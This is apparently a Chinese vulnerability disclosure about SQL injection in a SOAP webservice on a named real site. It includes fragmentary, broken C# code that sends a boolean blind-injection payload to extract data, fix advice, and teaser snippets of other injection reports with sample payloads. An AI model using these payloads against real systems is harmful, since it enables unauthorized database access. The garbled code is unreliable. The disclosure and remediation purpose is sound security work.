存在漏洞站點:mtodo.wanda.cn 不知道這站是幹啥的,先不管~~
漏洞檔案:
直接提交帶注入的引數,就會302:
既然有webservice,那就用**走soap協議來嘗試,於是操起vs亂寫了一通~~
當前使用者:
本屌寫的亂的一公尺的**:
cn.wanda.mtodo.servicemobile sm = new cn.wanda.mtodo.servicemobile();
private void btngetallcount_click(object sender, eventargs e)
if ((sm.getallcount("' or 1=1 and " + j + "=len(" + leix + ")--")).contains("1700"))
}this.txtmsg.text = this.txtuserid.text + " len: " + str_len + "\r\n";
this.txtmsg.text += leix + " : ";
if (str_len > 0)
;for (int k = 1; k <= str_len; k++));}
}else}}
}}catch(exception eq)}
1.引數化查詢,別拼sql語句了
2.webservice最好部署在內網裡呼叫~ 公網就別啟用了
愛康國賓(員工體檢)某重要分站SQL注入多庫和越權
嗯,這個點也是,我開始還以為是mysql 漏洞系統 mec.ikang.com 隨便在搜尋引擎搜尋一下,發現收錄了很多類似以下的連線 這裡可以看到 登陸的username就是kefupeixun 這個位址是不需要授權訪問的 b 但是,訪問這個位址之後,再訪問其他功能頁,就不需要登陸了,就是當前登陸的...
一 程式安全 SQL注入漏洞
先新建mydb.mdf,表myuser 測試頁面 一 利用報錯獲取資訊 操作 按姓名精確查詢,在輸入框輸入 小衛 and 1 db name 0 and 1 1 執行語句 select from myuser where uname 小衛 and 1 db name 0 and 1 1 結果 得到資...
KPPW最新版SQL注入漏洞一
kppw最新版sql注入一 kppw最新版sql注入一 檔案 control gy buyer order.php switch step if isset action else break default kekezu show msg 訪問頁面不存在 index.php 3,null,warn...